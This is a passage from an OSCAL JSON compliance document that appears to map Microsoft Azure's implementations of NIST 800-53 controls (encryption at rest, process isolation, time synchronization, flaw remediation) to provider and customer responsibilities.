statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"dc1bad5c-1f67-4933-9cb7-d3302379afe4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-28.1","statements":[{"uuid":"910126d1-8e27-4448-827f-3411eb002cf6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-051"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-28_smt","by-components":[{"uuid":"7a31d402-ec15-429c-ad7e-88b9f449a980","export":{"provided":[{"uuid":"995c0a49-7737-4e34-a5fd-c9596fe4961d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-051"}],"description":"Azure protects information at rest by applying information-handling procedures. Assets must be protected per the standards appropriate for their defined asset class. Microsoft's Online Services has devised a set of minimum required protection standards for each asset class to appropriately protect the confidentiality, integrity, and availability of each asset. These minimum standards are defined in the Asset Classification and Asset Protection Standards. Data must be classified according to Corporate, External, and Legal Affairs (CELA) data classifications and associated retentions. Protections for information at rest are outlined in, but not limited to, the categories below:_x000D_ _x000D_ * Azure Storage automatically encrypts data when persisting it to the cloud. Data in Azure Storage is encrypted and decrypted transparently using 256-bit AES encryption, one of the strongest block ciphers available, and is FIPS 140-2 compliant. Azure Storage encryption is enabled for all new and existing storage accounts and cannot be disabled. Storage accounts are encrypted regardless of their performance tier (standard or premium) or deployment model (Azure Resource Manager or classic). All Azure Storage redundancy options support encryption, and all copies of a storage account are encrypted. All Azure Storage resources are encrypted, including blobs, disks, files, queues, and tables. All object metadata is also encrypted._x000D_ * For each block written to Azure Storage accounts, a compressed and uncompressed CRC is used to identify corrupted data. Azure Storage checks the CRC after every major handoff of the data. In addition, a background job periodically runs on the extant assets checking the data checksum to find corrupted data._x000D_ * Azure uses the Transport Layer Security (TLS) protocol to protect data traveling between Azure services and customers. Azure datacenters negotiate a TLS connection with client systems that connect to Azure services. Perfect Forward Secrecy (PFS) protects connections between customers' client systems and Azure services by unique keys. Connections also use RSA-based 2,048-bit encryption key lengths._x000D_ * Logical access to protected data at rest is controlled at various levels through technical means. Access to servers where information is stored is restricted through Active Directory security group membership in the domain where the server resides. Security groups that restrict access to information at rest are configured to allow the least privilege possible to complete tasks. Any Microsoft personnel needing access must follow account creation, modification, and escalation procedures._x000D_ * Technical means also create logical access control at the network layer. ACLs prevent servers that store data at rest from being exposed outside of the environment._x000D_ * The Azure datacenter and Global Cloud Communication Center (GCC) teams maintain controls over physical access. The server rooms and caged environments have multiple access levels regulated with least privilege._x000D_ * Privileged Access Workstation (PAWs) utilizes BitLocker to protect information at rest._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c218adad-5257-47aa-bdd2-bc9d1dbf8c2b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-051"}],"description":"The customer is responsible for protecting customer-controlled information at rest. Microsoft Azure Storage provides the capability for customers to protect their information at rest using Azure SAKs provided by Microsoft Azure. The SAK is a secret key that is used to manage access to storage. An application that needs to access storage must have possession of this key. It is the customer's responsibility to protect the SAKs in order to protect their data.","provided-uuid":"995c0a49-7737-4e34-a5fd-c9596fe4961d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"dc075fa2-555a-40fb-b410-9b553d863c92","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-052"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-28.1_smt","by-components":[{"uuid":"d918664e-10f2-4e20-a6f0-ae60d416fdd5","export":{"provided":[{"uuid":"0b9da60c-c638-449e-8352-6f32aaec0d2a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-052"}],"description":"Azure Storage automatically encrypts data when persisting it to the cloud. Data in Azure Storage is encrypted and decrypted transparently using 256-bit AES encryption, one of the strongest block ciphers available, and is FIPS 140-2 compliant. Azure Storage encryption is enabled for all new and existing storage accounts and cannot be disabled. Storage accounts are encrypted regardless of their performance tier (standard or premium) or deployment model (Azure Resource Manager or classic). All Azure Storage redundancy options support encryption, and all copies of a storage account are encrypted. All Azure Storage resources are encrypted, including blobs, disks, files, queues, and tables. All object metadata is also encrypted._x000D_ _x000D_"}],"responsibilities":[{"uuid":"5fd88169-0e9e-4862-bafc-fa013c3965e1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-052"}],"description":"The customer is responsible for protecting customer-controlled information at rest from unauthorized disclosure and modification.","provided-uuid":"0b9da60c-c638-449e-8352-6f32aaec0d2a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5ac1b0d0-e111-4184-8cc4-d4b4a1842c29","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-39","statements":[{"uuid":"7276a48f-406e-4204-8703-fbb7e517524e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-053"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-39_smt","by-components":[{"uuid":"1e7532a2-eb0d-4df3-a1fa-89b888e8bf31","export":{"provided":[{"uuid":"a9ca226b-7797-460c-bdf1-90e2b3dd2f73","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-053"}],"description":"All Azure servers run operating systems that maintain separate execution domains for each executing process by assigning a private virtual address space to each process. In addition, all operating systems used in the Azure environment employ multi-thread processing, which is consistent with modern operating systems. Multi-thread processing allows for multiple processes to be executed concurrently and in isolation. See the following TechNet article for more information:_x000D_ _x000D_ <https://technet.microsoft.com/en-ca/aa366785%28v=vs.90%29>._x000D_ _x000D_"}],"responsibilities":[{"uuid":"06e16e64-814c-40d3-a5bd-f79b07bfc3ab","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-053"}],"description":"The customer is responsible for maintaining separate execution domains for running processes.","provided-uuid":"a9ca226b-7797-460c-bdf1-90e2b3dd2f73"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"dd4b6f66-e85e-4c76-ae17-3853975682ec","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-45","statements":[{"uuid":"299f25b7-3d7c-46b1-9758-49388c6ef006","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-054"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-45_smt","by-components":[{"uuid":"9f75ed86-a905-44f5-83e1-6feabd4643c6","export":{"provided":[{"uuid":"c5af5bdd-32c0-41a4-8255-f2b58c170dcd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-054"}],"description":"For Bare Metal servers, all assets are joined to an Active Directory domain and configured to receive authenticated time updates from the local domain controller via NTP and synchronize at least hourly. For Azure-based servers and network devices, all assets are configured to use the Coordinated Universal Time (UTC) setting when generating event logs. Once servers are joined to an Active Directory domain, they are configured by policy to receive authenticated time updates from the local domain controller via NTP and synchronize at least hourly and update the time if it is off by 1 millisecond or more. Local domain controllers obtain their time updates from Azure time servers. All Azure servers are configured to synchronize every five (5) minutes through Azure-managed domain controllers; network devices synchronize every five (5) minutes with the same time servers used by the Azure domain controllers. The Azure time servers are NTP stratum 1 time servers. Azure manages two different NTP time servers in separate geographic locations. The time servers are geographically dispersed and located in multiple separate Azure-managed datacenters. Azure chooses to use the GPS satellites as the authoritative time source as an alternative to the NIST time hosts. All Azure assets synchronize the internal system clocks to the authoritative time source at least every hour and update the time if it is off by one (1) millisecond or more."}],"responsibilities":[{"uuid":"ba39bff0-8bda-4f55-afa1-2b51be830307","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-054"}],"description":"The customer is responsible for synchronizing system clocks within and between customer-deployed resources.","provided-uuid":"c5af5bdd-32c0-41a4-8255-f2b58c170dcd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e9839d46-2949-45d8-96ef-1e5c9cb32a3d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-45.1","statements":[{"uuid":"83e25bc2-b2b8-4f02-8a45-07f92192a9b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-055"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-45.1_smt.a","by-components":[{"uuid":"8f20cac3-37bb-4644-b4b0-f9a550c6bd41","export":{"provided":[{"uuid":"08588581-2b6b-4014-8109-a00729c96749","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-055"}],"description":"Azure manages two different NTP time servers in separate geographic locations. The time servers are geographically dispersed and located in multiple separate Azure-managed datacenters. Azure chooses to use the GPS satellites as the authoritative time source as an alternative to the NIST time hosts. Azure compares internal system clocks deployed on Azure assets to GPS satellites. All Azure assets synchronize the internal system clocks to the authoritative time sources at least every hour and update the time if it is off by one (1) millisecond or more."}],"responsibilities":[{"uuid":"e014ccfd-337c-41bf-9c13-0bc88347c757","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-055"}],"description":"The customer is responsible for comparing internal system clocks at a defined frequency with defined authoritative time source for customer-deployed resources.","provided-uuid":"08588581-2b6b-4014-8109-a00729c96749"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"5c116a0e-cf69-4e7c-a2b4-d2a2fb1ec2e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-056"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-45.1_smt.b","by-components":[{"uuid":"380af501-02a2-4a39-ae18-f1e9bf375320","export":{"provided":[{"uuid":"554b8aaf-e475-41bf-b363-9254d7a0a79d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-056"}],"description":"Azure manages two different NTP time servers in separate geographic locations. The time servers are geographically dispersed and located in multiple separate Azure-managed datacenters. Azure chooses to use the GPS satellites as the authoritative time source as an alternative to the NIST time hosts. Azure synchronizes internal system clocks deployed on Azure assets to GPS satellites. All Azure assets synchronize the internal system clocks to the authoritative time sources at least every hour and update the time if it is off by one (1) millisecond or more."}],"responsibilities":[{"uuid":"fa59a567-6e6e-49a2-84bc-ba726b82afc6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-056"}],"description":"The customer is responsible for synchronizing the internal system clocks to the authoritative time source when the time difference is greater than defined time period for customer-deployed resources.","provided-uuid":"554b8aaf-e475-41bf-b363-9254d7a0a79d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"907687f3-b4e8-4323-b31a-67449ca1fbfa","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-2","statements":[{"uuid":"4559ccf8-52de-4087-98c3-ba45a2fdefe9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-2_smt.a","by-components":[{"uuid":"d800fa16-7daf-4017-a500-db871f22a407","export":{"provided":[{"uuid":"035b4dec-2f34-407c-8e97-a1a2be70ada6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-006"}],"description":"Flaw Identification_x000D_ _x000D_ To identify applicable software flaws, the C+AI Security team tracks multiple sources of information for vulnerability-related data. These sources include the Microsoft Security Response Center (MSRC), vendor websites, and other third-party websites. Updates tracked by these sources are monitored by C+AI Security for possible inclusion on its monthly security bulletins, notifications, and advisories. Based on their applicability to the Azure environment, Only a subset of these updates may be required by C+AI Security._x000D_ _x000D_ Microsoft publishes bulletins that include specific information relevant to the security update being released. Azure reviews vulnerabilities that are deemed to have a significant impact to the operational environment. Microsoft bulletins are disseminated to all personnel. Additional information can be found on the following websites:_x000D_ _x000D_ * MSRC: <https://www.microsoft.com/en-us/msrc>_x000D_ * MSRC Bulletins and Advisories: <https://msrc.microsoft.com/update-guide/>_x000D_ _x000D_ Non-Microsoft software used in Azure to provide infrastructure services and client services is kept current for the optimal operation of the environment. Each software vendor provides information about their security updates. Vendor websites are monitored, including, but not limited to:_x000D_ _x000D_ * Cisco: <https://tools.cisco.com/security/center/publicationListing.x>_x000D_ * Juniper: <https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES>_x000D_ * TippingPoint: <https://tmc.tippingpoint.com/TMC>_x000D_ * F5 Networks: <https://www.f5.com/services/support/security-incident-response-team-sirt> and <https://support.f5.com/csp/home>_x000D_ * NetScaler: <https://support.citrix.com/securitybulletins/>_x000D_ _x000D_ For network devices, vendors make Azure Networking aware of security vulnerabilities on their products via email. The email is logged into Azure DevOps and analysis is performed to evaluate possible risks and mitigations. Azure Networking has dedicated support engineers from the major hardware vendors, including Cisco, Juniper, and F5, that assist with the analysis and determination of the course of action. Azure Networking tracks the issue to completion. A similar process is followed with updates provided by other vendors, with the goal of matching the updates required to the current Azure environment._x000D_ _x000D_ The C+AI Security team monitors Azure using automated vulnerability scanning tools. These tools are configured to provide the C+AI Security team and users specific system security flaws. Azure configures these tools based on knowledge provided by vendors and other sources, including analysis by C+AI Security. The C+AI Security team conducts the following activities monthly._x000D_ _x000D_ On the Thursday prior to release, the C+AI Security team holds a conference call with Azure stakeholders to review updates that are required in the Azure environment, based on the data provided in the Advance Notification Service by MSRC. Minutes from this call are recorded and saved for historical understanding of the rationale used to determine which updates were required in the past._x000D_ _x000D_ On release day, the second Tuesday of every month, MSRC provides a review via conference call of detailed information with Azure stakeholders for inclusion on the list of updates required in the Azure environment. A consensus is reached with Azure stakeholders on the required security updates for the Azure environment. Meeting minutes record attendees and any concerns regarding all released security updates._x000D_ _x000D_ MSRC sends e-mail communication to broad Azure distribution lists that includes list of required updates, the download location of required software, and deadline for installation of the updates. After the email communication is sent, the same information is posted to the internal C+AI Security website for future reference._x000D_ _x000D_ Impact assessments are conducted for all vulnerabilities identified. The assessment encompasses multiple factors, including:_x000D_ _x000D_ * Access required, local or remote_x000D_ * Authentication requirements_x000D_ * Exploit availability_x000D_ * Outcome of exploitation such as remote code execution or elevation of privilege_x000D_ _x000D_ Flaw Correction_x000D_ _x000D_ The C+AI Security team assesses the vulnerability severity and criticality impact based on documented and deduced software and technology deployment and use in Azure environments. For example, Microsoft Expression Web is not used in Azure servers and therefore a vulnerability that impacts Expression Web is outside of the scope of updates required to be applied._x000D_ _x000D_ C+AI Security collects information from a variety of sources and scanners to help determine the inventory of applications installed in servers and the current threat surface. Specific steps in the vulnerability process include:_x000D_ _x000D_ * Review mitigating controls that may affect the vulnerability rating such as firewalls, Microsoft Defender for Endpoint (MDE) antivirus software, and ACLs_x000D_ * Review the Asset Value for the affected assets_x000D_ * Determine the timeframe for the application of the required updates_x000D_ _x000D_ Most security updates are required to be installed within thirty (30) days of the notification of the update's availability. C+AI Security occasionally requires an expedited timeline for the application of security updates based on the following criteria:_x000D_ _x000D_ * Applications or services affected_x000D_ * Availability of reliable exploit code_x000D_ * Prevalence of exploit activity_x000D_ * External regulator requirements, such as a Cybersecurity and Infrastructure Security Agency (CISA) Emergency Directive_x000D_ _x000D_ Information collected from C+AI Security monitoring efforts or an increase on the risk level faced by Azure servers may be used to expedite remediation of outstanding security vulnerabilities after the original deadline was set. These changes are communicated to the necessary personnel._x000D_ _x000D_ In partnership with other Azure teams, C+AI Security collects, analyzes, and alerts the security contacts for the affected property on system and network behavior that may be deemed malicious or that could be the effect of an intrusion. In coordination with the Security Response Team, events are analyzed and, if deemed to be an incident, are handled in accordance with the Incident Management SOP._x000D_ _x000D_ Verified flaws identified for Azure as a result of the Vulnerability Scanning Tools scan process are identified and tracked as part of the Azure Plan of Actions and Milestones (POA&M) process._x000D_ _x000D_ Flaw Reporting_x000D_ _x000D_ Reporting of security vulnerabilities is conducted via vulnerability scanning tool results. Azure provides a Vulnerability Management and Reporting Tool which provides Microsoft personnel the ability to review vulnerability data from a reporting interface. Vulnerability scans are conducted monthly at minimum. The vulnerability scan tools provide reports based on multiple criteria, including property, server, and security update. Communication from the C+AI Security team via Service 360 (S360) and email is used to notify service teams in cases of elevated risk or when expedited action is necessary. The remediation of vulnerabilities is one of the primary goals of the C+AI Security team. A variety of tools and processes are used to drive remediation:_x000D_ _x000D_ * Direct engagement with properties_x000D_ * Targeted efforts_x000D_ * Direct e-mail communication with service teams to drive remediation of high risk or expedited vulnerabilities._x000D_ * Security updates deployment services_x000D_ _x000D_"}],"responsibilities":[{"uuid":"dbc295c2-9ebe-4da2-a08f-f35a87ee29a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-006"}],"description":"The customer is responsible for flaw remediation on customer-deployed resources, including the identification, reporting, and correction of flaws.","provided-uuid":"035b4dec-2f34-407c-8e97-a1a2be70ada6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ec55e299-45c0-43fc-b073-946977c12d29","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-2_smt.b","by-components":[{"uuid":"4003c288-6893-4826-9dcf-4af376a30be3","export":{"provided":[{"uuid":"9335bee0-6a0f-451f-a086-71e02963740b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-007"}],"description":"Testing of software updates related to flaw remediation must follow the standard change management process as outlined in the Microsoft Change Management Standard. Service teams test possible changes to the environment to understand impacts to the security and operations of the system. Testing is also conducted via the Safe Deployment Practices (SDP)._x000D_ _x000D_"}],"responsibilities":[{"uuid":"50845dc4-9a1a-41a5-893c-c6b4a8b60dcc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-007"}],"description":"The customer is responsible for testing updates related to flaw remediation for effectiveness and potential side effects prior to installation on customer-deployed resources.","provided-uuid":"9335bee0-6a0f-451f-a086-71e02963740b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"382742e9-4e49-4e88-9d7c-21290a5396c3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-2_smt.c","by-components":[{"uuid":"b96beb97-4290-4df0-bcc8-cf0271854994","export":{"provided":[{"uuid":"c7c48e13-b355-4967-8a3f-7753950a6d9c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-008"}],"description":"As noted in Part a, most security updates are required to be installed within thirty (30) days of the notification of the update's availability. C+AI Security requires on occasion an expedited timeline for the application of security updates based on the following criteria:_x000D_ _x000D_ * Applications or services affected_x000D_ * Availability of reliable exploit code_x000D_ * Prevalence of exploit activity_x000D_ * External regulator requirements, such as a Cybersecurity and Infrastructure Security Agency (CISA) Emergency Directive_x000D_ _x000D_ Information collected from C+AI Security monitoring efforts or an increase on the risk level faced by Azure servers may be used to expedite remediation of outstanding security vulnerabilities after the original deadline was set. These changes are communicated to the necessary personnel._x000D_ _x000D_ Azure uses automated tools to determine whether a required security flaw has been remediated properly and the date of installation of security updates. These tools collect information from each asset and compare it to the requirements defined for each security update or vulnerability ID._x000D_ _x000D_"}],"responsibilities":[{"uuid":"aabebb07-cbe8-4a73-a848-7d48788b518f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-008"}],"description":"The customer is responsible for installing security-relevant software updates to customer-deployed resources within a customer-defined time period after the release of the update.","provided-uuid":"c7c48e13-b355-4967-8a3f-7753950a6d9c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8873437f-a532-44ca-8cf1-5b0a00635202","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-2_smt.d","by-components":[{"uuid":"c7c1150f-c331-4048-83b6-21fe59069112","export":{"provided":[{"uuid":"6ebeae7d-a87a-4f8a-bc12-b268874c0ad1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-009"}],"description":"Flaw remediation follows the standard change management process as outlined in the Microsoft Change Management Standard. The Policy Directives section describes the information required for submission of a request for change (RFC). As part of every RFC submission, an RFC must contain a detailed test outlining steps of the change, success metrics of the test, and a rollback plan as a risk mitigation procedure. The change review committee evaluates the RFC to grant approval prior to implementation in a production environment._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c775f061-e54a-4194-beef-b925cd85c0ef","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-009"}],"description":"The customer is responsible for including flaw remediation in configuration management.","provided-uuid":"6ebeae7d-a87a-4f8a-bc12-b268874c0ad1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"97b76319-efc7-4b02-aa50-06044864d0dc","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-2.2","statements":[{"uuid":"5fd1a9b1-b30d-43ee-8a21-345524b38b64","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-2.2_smt","by-components":[{"uuid":"b71770a3-d789-4a52-be2d-3b0e0d3e9e20","export":{"provided":[{"uuid":"680a41b1-6214-4c5b-9cdb-22f307dd4c24","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-010"}],"description":"Azure utilizes a number of automated tools for vulnerability management. These tools perform scanning at least monthly and on demand against the Azure environment and determine the state of information system components regarding flaw remediation._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c676e421-0d3e-4305-8652-7714fd964141","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-010"}],"description":"The customer is responsible for employing automated mechanisms to determine flaw remediation status.","provided-uuid":"680a41b1-6214-4c5b-9cdb-22f307dd4c24"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ebbc4f94-eb86-4315-8e55-8b4b4873fa31","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-2.3","statements":[{"uuid":"ca591fa3-ea4c-4f85-9eed-69d250f6088c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-2.3_smt.a","by-components":[{"uuid":"624ff750-92e4-46b9-9dd2-29390ce18653","export":{"provided":[{"uuid":"e28b4024-4bff-4c04-b57a-cfded1d67be4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-011"}],"description":"Azure scans all assets with vulnerability scanners. These scanners produce timestamps of initial flaw detections and flaw remediation and are used to calculate the time elapsed between the two._x000D_ _x000D_"}],"responsibilities":[{"uuid":"9786a4ed-9b1f-46fe-b8fe-eb118df9369d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-011"}],"description":"The customer is responsible for remediating flaws within customer-deployed resources, including measuring the time between flaw identification and flaw remediation.","provided-uuid":"e28b4024-4bff-4c04-b57a-cfded1d67be4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"46b23513-b6bf-4b97-aeff-90ea06f1d681","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-2.3_smt.b","by-components":[{"uuid":"721dc097-e065-45d5-a110-16056092e0db","export":{"provided":[{"uuid":"c3a3e096-95eb-4737-87ba-1c804329d4ec","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-012"}],"description":"To track and benchmark flaw remediation, Azure conducts reporting of security vulnerabilities via the scan results. Azure utilizes a Vulnerability Management and Reporting Tool which provides Azure personnel the ability to review vulnerability data from a reporting interface including the date the patch was made available._x000D_ _x000D_ Most security updates are required to be installed within thirty (30) days of the notification of the update's availability. Verified flaws identified for Azure as a result of the monthly scan process are identified and tracked as part of the Azure Plan of Actions and Milestones (POA&M) process._x000D_ _x000D_"}],"responsibilities":[{"uuid":"f7d86e50-7e49-4c37-b86a-61230b949611","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-012"}],"description":"The customer is responsible for remediating flaws within customer-deployed resources and establishing customer-defined benchmarks for taking corrective actions.","provided-uuid":"c3a3e096-95eb-4737-87ba-1c804329d4ec"}]},"description":"See inheritance and customer responsibility 